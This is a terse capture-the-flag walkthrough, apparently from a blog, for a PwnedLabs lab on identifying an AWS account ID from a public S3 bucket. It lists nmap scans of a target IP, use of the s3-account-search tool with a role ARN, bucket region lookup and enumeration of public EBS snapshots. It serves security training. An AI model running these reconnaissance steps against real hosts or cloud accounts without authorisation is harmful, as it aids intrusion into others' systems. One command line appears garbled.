PwnedLabs Identify the AWS Account ID from a Public S3 bucket


Linux

ping -c 1 54.204.171.32

We can see that it is a Linux server

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 54.204.171.32 -oG allPorts

nmap -sCV -p80 54.204.171.32 -oN targeted

whatweb http://54.204.171.32

pip3 install s3-account-search

sudo ln -s /home/user/.local/bin/s3-account-search /usr/local/bin/s3-account-search

This is like running whoami, but for AWS

aws sts get-caller-identity

bc targeted -l rb

s3-account-search arn:aws:iam::427648302155:role/LeakyBucket mega-big-tech

curl -I https://mega-big-tech.s3.amazonaws.com | grep region | awk '{print $2}'

aws ec2 describe-snapshots --owner-ids 107513503799 --restorable-by-user-ids all

© 2024 Cu3rv0x